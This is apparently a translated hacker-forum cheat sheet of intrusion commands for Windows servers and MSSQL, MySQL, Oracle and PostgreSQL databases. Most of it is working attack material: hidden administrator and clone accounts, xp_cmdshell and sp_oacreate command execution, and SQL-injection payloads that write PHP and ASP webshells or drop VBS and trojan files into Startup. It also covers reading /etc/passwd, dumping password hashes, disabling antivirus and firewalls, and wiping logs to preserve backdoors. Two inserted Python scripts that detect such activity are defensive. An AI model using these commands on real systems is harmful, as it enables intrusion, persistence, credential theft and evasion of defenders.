1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left empty when logging in over 3389 and you log straight in; once inside, run net user administrator /passwordreq:yes to restore it.
2. A rather clever sequence for building a clone account:
First create a user-level account,
then export the registry, then delete the account in Computer Management,
then re-import it and add it to the administrators group.
3. Looking up the radmin password:
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
Create a key named "services.exe",
then under it create a string value
whose data is the full path of the trojan.
5. runas /user:guest cmd
Tests the user's permissions!
6. tlntadmn config sec = -ntlm  exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'-- This actually makes use of the tlntadmn command; for details type /? and have a look. (This one needs administrator privileges.) Creating the same user and passing NTLM authentication needs no explanation from me, right?
7. Post-intrusion patching, trace cleanup and backdoor placement:
Basic vulnerabilities must be patched, such as SU privilege escalation and SA injection. For DBO injection consider killing xp_treelist and xp_regread, and note the web directory yourself. You must remember to clean up your traces. For SQL Server it is better to connect with Enterprise Manager; using Query Analyzer leaves records at HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, so delete them. When clearing IIS logs do not use AIO-type tools that wipe the logs completely; choose a logcleaner-type tool that deletes only the access records for a given IP. If you can obtain the administrator password via gina, log in as the administrator to clean the logs and do the final trace cleanup with WYWZ. That said, manual cleanup is safer. Finally leave a backdoor that produces no log records: several one-line backdoors, a standard backdoor and a cfm backdoor are what I usually leave at minimum. Remember to modify the timestamps. One more rather nasty trick: if the machine is just an ordinary zombie, drop a TXT on the administrator's desktop telling him you broke in, planted some backdoor and added some user (not your real important backdoor, of course) and asking him to clean it up. That way there is a good chance your real backdoor survives.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
for example:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
9. MSSQL Server 2005 has xp_cmdshell switched off by default; to enable it you must turn it on through the advanced options.
You can inject it directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then: ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then: ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
After the extended stored procedures have been deleted there is a very simple way to restore them:
Deletion:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
Restoration:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
This restores them directly, regardless of whether sp_addextendedproc still exists.

-----------------------------

Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'
SQL statement to restore cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended stored procedure exists:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means OK.

Restore xp_cmdshell:
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means OK.

Otherwise upload xplog70.dll:
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL statement to block cmdshell:
sp_dropextendedproc "xp_cmdshel
-------------------------
Clear the 3389 login history with a built-in system command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.
View the current user's privileges in MySQL:
show grants for

The following statements create a user with the same privileges as root. You will have run into this when taking sites: the MySQL root user can only connect locally and refuses outside connections. The method below solves that problem: the statements create a user itpro with password 123 and the same privileges as root, allowed to connect from any host, so you can conveniently operate the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

When you're done, remember to remove your footprints.

Drop USER 'itpro'@'%';
Drop DATABASE IF EXISTS `itpro` ;
Current user obtaining SYSTEM privileges:
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
Code:
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec",user)
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>

Bypassing the CAPTCHA restriction to get into the backend and obtain a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save as code.reg, import it into the registry and restart IE;
that's all it takes.
Writing a shell via union:
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

Applied to the dedecms injection vulnerability: writing a shell without the backend.
In the dedecms backend, when there is no file manager and no outfile privilege,
go to Plugin Management - Virus Scan
and write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format shown above.
In Oracle, after logging in as a low-privileged user, you can run the following statement to query the hashes of sys and other users, then crack them with cain:
Code:
select username,password from dba_users;

MySQL remote connection user
Code:
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

1. Query the terminal service port

xp&2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2. Enable terminal services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. Change the terminal port to 20008 (0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Remove the XP & 2003 system firewall restriction on terminal service port 3389 and the IP connection restriction

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f

5. Enable the Win2000 terminal service on port 3389 (reboot required)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "ortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "ortNumber"=dword:00000D3D >>2000.reg

6. Force a restart of Win2000 & Win2003 (the system reboots automatically after the last line executes)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7. Disable TCP/IP port filtering (reboot required)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8. When the terminal has reached its maximum number of connections, use the following command to connect

mstsc /v:ip:3389 /console

9. Adjust NTFS partition permissions

cacls c: /e /t /g everyone:F  (everyone gets full control of drive C:)
cacls %systemroot%\system32\*.exe /d everyone  (deny everyone access to the exe files in system32)

------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "ortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "ortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")

Delete the awgina.dll registry value
Code:
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

Set it to 1 to disable LM hash storage.

Database security: common commands for intruding Oracle databases
Recently I ran into a server using an Oracle database; after frantically studying Oracle and consulting the experts I finally got hold of every user password for the website's backend management interface. I found Oracle a real pain to operate, so to spare the brothers some detours in future I have compiled the commands that are essential during an intrusion.
1. su – oracle  Not required; suitable when you don't have the DBA password, since it lets you enter the sqlplus interface without a password.
2. sqlplus /nolog or sqlplus system/manager or ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba ;(as sysoper) or
connect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup;  starts the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$databases;  view the database structure fields
7. How to see which users have SYSDBA or SYSOPER privileges:
SQL>select * from V_$PWFILE_USERS;
Show user;  shows the user of the current database connection
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View a table's structure: desc all_tables;
12. Show the structure of all fields of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Get the records in table CQI.T_BBS_XUSER:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant privileges to the user:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change database users' passwords (set the sys and system passwords to test):
alter user sys identified by test;
alter user system identified by test;

applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml  database connection configuration
\WEB-INF\server.xml  roughly the equivalent of http.conf + mysql.ini + php.ini
\WEB-INF\struts-config.xml  file and directory structure

spring.properties contains the name of the hibernate.cfg.xml file

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

If none of these can be found, look at the class files.

View the shared folders in a virtual machine:
run this in cmd inside the VM:
\\.host\Shared Folders

Tips for finding the terminal service from cmdshell
Finding the terminal:
Step 1: Tasklist /SVC lists all processes and system services with their PIDs;
the service name corresponding to the terminal is TermService.
Step 2: use netstat -ano to list the PID for every port,
and find the port corresponding to that PID.

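As an added example (not from the original post), here is the same two-step lookup done the defender's way: parse `tasklist /svc` to find the PID hosting TermService, parse `netstat -ano` for that PID's listening TCP ports, and flag a terminal service that is listening somewhere other than 3389 (the port-changing trick described elsewhere in these notes). The tasklist and netstat output embedded below is constructed sample text, not captured from a real host.

```python
import re

# One data row of `tasklist /svc`: image name, PID, comma-separated service list (or N/A).
# Header and separator rows contain no digits, so they never match.
TASKLIST_ROW = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+(?P<services>\S.*)$")

# Constructed sample output (assumption: not captured from a real host).
SAMPLE_TASKLIST = """\
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
svchost.exe                    952 TermService
svchost.exe                   1064 Dnscache, LanmanWorkstation
winvnc4.exe                   1480 WinVNC4
"""

SAMPLE_NETSTAT = """\

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       780
  TCP    0.0.0.0:20008          0.0.0.0:0              LISTENING       952
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING       1480
  TCP    192.0.2.10:20008       198.51.100.2:51234     ESTABLISHED     952
  UDP    0.0.0.0:445            *:*                                    4
"""


def parse_tasklist_svc(text):
    """Map PID -> list of service names hosted by that process."""
    services = {}
    for line in text.splitlines():
        m = TASKLIST_ROW.match(line.rstrip())
        if not m:
            continue
        svc = m.group("services").strip()
        names = [] if svc == "N/A" else [s.strip() for s in svc.split(",")]
        services[int(m.group("pid"))] = names
    return services


def parse_netstat_listeners(text):
    """Map PID -> sorted list of TCP ports in LISTENING state (UDP and non-listening rows skipped)."""
    listeners = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP" or parts[3] != "LISTENING":
            continue
        port = int(parts[1].rsplit(":", 1)[1])   # rsplit also copes with [::]:port
        listeners.setdefault(int(parts[4]), set()).add(port)
    return {pid: sorted(ports) for pid, ports in listeners.items()}


def ports_for_service(tasklist_text, netstat_text, service):
    """Listening TCP ports of every process that hosts `service` (e.g. TermService)."""
    pids = [pid for pid, names in parse_tasklist_svc(tasklist_text).items() if service in names]
    listeners = parse_netstat_listeners(netstat_text)
    return sorted({p for pid in pids for p in listeners.get(pid, [])})


def find_rdp_anomalies(tasklist_text, netstat_text, expected_port=3389):
    """Defender's check: ports on which TermService listens other than the expected one."""
    return [p for p in ports_for_service(tasklist_text, netstat_text, "TermService")
            if p != expected_port]


if __name__ == "__main__":
    print("TermService listens on:", ports_for_service(SAMPLE_TASKLIST, SAMPLE_NETSTAT, "TermService"))
    odd = find_rdp_anomalies(SAMPLE_TASKLIST, SAMPLE_NETSTAT)
    if odd:
        print("WARNING: terminal service on non-standard port(s):", odd)
```

Run the same two functions on real output saved from the commands above to inventory a host; a TermService listener on a port other than 3389 (20008 in the constructed sample) is what the registry edits in these notes produce.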
Query the password hash in SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
Exporting a shell from Access

Complete code for adding a user through MySQL on a Chinese-language OS:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English-language version:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
drop table a;
A note on how to deal with that pesky Norton
Check the path of the Norton service:
sc qc ccSetMgr
Then set permissions to deny access. Go all the way:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server:
iisreset /reboot
That takes care of it. But when you're done, remember to restore the permissions:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

Some notes on PostgreSQL injection
How to get a webshell:
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
How to read a file:
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
There are two ways to execute commands: one needs a custom function backed by libc, the other uses pl/python.
Of course, the PostgreSQL version must be higher than 8.x for these.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Execute the shell command, writing its output to a file:
SELECT system('uname -a > /tmp/test')

Copy the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the command output back from the output table to see whether the command succeeded:
SELECT system_out FROM stdout
Below is a test example:

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
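As an added example (not part of the original post), written from the defender's side: the MSSQL payloads earlier in these notes (sp_configure 'xp_cmdshell', dbcc addextendedproc, sp_oacreate, xp_dirtree) and the PostgreSQL ones just above (CREATE FUNCTION ... '/lib/libc.so.6', COPY ... FROM/TO) all arrive as stacked queries inside a request parameter, so a web-access-log scan can pick them up. The Python below URL-decodes each request and matches those signatures against constructed sample log lines; the log format, client IPs, timestamps and paths are constructed assumptions, not data from the post.

```python
import re
from urllib.parse import unquote_plus

# Apache combined-log prefix: client, identd, user, [timestamp], "METHOD URL PROTO", status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)

# Signatures for the techniques quoted in these notes. Each regex is applied to a
# lower-cased, URL-decoded, whitespace-collapsed request and yields its name on a match.
SIGNATURES = [
    ("mssql_enable_xp_cmdshell", re.compile(r"sp_configure\s*'xp_cmdshell'")),
    ("mssql_addextendedproc", re.compile(r"addextendedproc")),
    ("mssql_xp_cmdshell", re.compile(r"xp_cmdshell")),
    ("mssql_sp_oacreate", re.compile(r"sp_oacreate\s*'wscript\.shell'")),
    ("mssql_xp_dirtree", re.compile(r"xp_dirtree")),
    ("pgsql_libc_function", re.compile(r"create\s+function\s+\w+\s*\(\s*cstring\s*\).*libc\.so")),
    ("pgsql_copy_file", re.compile(r"\bcopy\s+\w+(\s*\([^)]*\))?\s+(from|to)\s+")),
    ("stacked_query", re.compile(r";\s*(exec|execute|create|insert|copy|select|dbcc|drop)\b")),
]

# Constructed sample log lines (assumption: IPs, timestamps and paths are made up).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Jul/2011:04:00:01 +0800] "GET /news.asp?id=5;EXEC%20sp_configure%20'show%20advanced%20options',%201;RECONFIGURE;EXEC%20sp_configure%20'xp_cmdshell',%201;RECONFIGURE;-- HTTP/1.1" 200 512
203.0.113.7 - - [17/Jul/2011:04:00:09 +0800] "GET /store.php?id=1;%20CREATE%20FUNCTION%20system(cstring)%20RETURNS%20int%20AS%20'/lib/libc.so.6','system'%20LANGUAGE%20'C'%20STRICT%20-- HTTP/1.1" 200 233
198.51.100.2 - - [17/Jul/2011:04:01:12 +0800] "GET /news.asp?id=5 HTTP/1.1" 200 1834
203.0.113.7 - - [17/Jul/2011:04:02:30 +0800] "GET /store.php?id=1;%20COPY%20stdout(system_out)%20FROM%20'/tmp/test'%20-- HTTP/1.1" 500 0
"""


def normalise(url):
    """URL-decode twice (payloads are often double-encoded), collapse whitespace, lower-case."""
    text = unquote_plus(unquote_plus(url))
    return re.sub(r"\s+", " ", text).lower()


def classify_request(url):
    """Names of every signature that matches one request URL (empty list if clean)."""
    text = normalise(url)
    return [name for name, rx in SIGNATURES if rx.search(text)]


def scan_log(log_text):
    """Parse log lines and return one finding per request matching any signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue   # not a request line we understand; skip rather than guess
        hits = classify_request(m.group("url"))
        if hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "url": m.group("url"), "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["ts"], ", ".join(f["hits"]))
        print("   ", normalise(f["url"]))
```

The decoded text is matched rather than the raw URL so that `%20`, `+` and double-encoded payloads all normalise to the same string; the generic `stacked_query` signature fires on any `;EXEC` / `;CREATE` / `;COPY` sequence, so it catches variants even when the specific procedure names are obfuscated by splitting (as in the `EXEC('ma'+'ster..x'+...)` trick above), which the named signatures would miss.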
net stop sharedaccess  (stop the default firewall)
netsh firewall show  (show/configure the default firewall)
netsh firewall set notifications disable  (disable the notification shown when a program is blocked by the default firewall)
netsh firewall add allowedprogram c:\1.exe Svchost  (add a program to the default firewall's allowed list)
Method for changing the 3389 port (harder to pick up by scanning after the change)
Change the server-side port setting; there are 2 registry locations to modify:

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
The PortNumber value, 3389 by default; change it to the desired port, e.g. 6000

Second location:
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
The PortNumber value, 3389 by default; change it to the desired port, e.g. 6000

That's all; reboot the system and it takes effect.

Script to log 3389 remote logins
Save as a bat file:
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer

mstsc parameters:

Remote Desktop Connection

MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.
/v:<server[:port]> -- specifies the terminal server to connect to.
/console -- connects to the console session of the server.
/f -- starts the client in full-screen mode.
/w:<width> -- specifies the width of the remote desktop screen.
/h:<height> -- specifies the height of the remote desktop screen.
/edit -- opens the specified .rdp file for editing.
/migrate -- migrates legacy connection files created with Client Connection Manager to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens another virtual session, which amounts to a separate logon to the computer. In other words, connecting with the console parameter gives you the desktop shown on the monitor. Give it a try; it comes in handy sometimes, especially when some software
mstsc /console /v:124.42.126.xxx  bypasses the limit on the number of terminal connections

Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
control userpasswords2  view users' passwords
Export an Access database directly as a shell; the prerequisite is that table a exists in the Access database and you know the site's real path:
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

141. When doing manual MSSQL injection, if you cannot bounce the data out or write it to a file, most people read the records out one at a time, which is exhausting. Here is a single statement that reads out all the data:
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
Method for shutting down McAfee: // requires SYSTEM privileges, use at or psexec -s cmd.exe
.com files such as nc.com can be uploaded to get around McAfee's executable restriction;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D6 V$ N# x: |0 x7 L
$ O% h0 u6 y: n3 w" J6 D VNCDump.zip (4.76 KB, 下载次数: 1)
: x$ C/ E( Z1 |' f# }, l密码在线破解http://tools88.com/safe/vnc.php$ h6 P. N% E! x, ]$ h/ B
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
exec master..xp_cmdshell 'net user'
Executing commands via MSSQL.
Query to get the MSSQL password hashes:
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
MSSQL database shrinking
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses game_db_201107170400.BAK into 1.rar, split into 200 MB volumes.

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database as game.bak at D:\WebSites\game.com\UpFileList\game.bak

Key points for penetrating Discuz!NT 3.5:
(1) Visit site-address/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
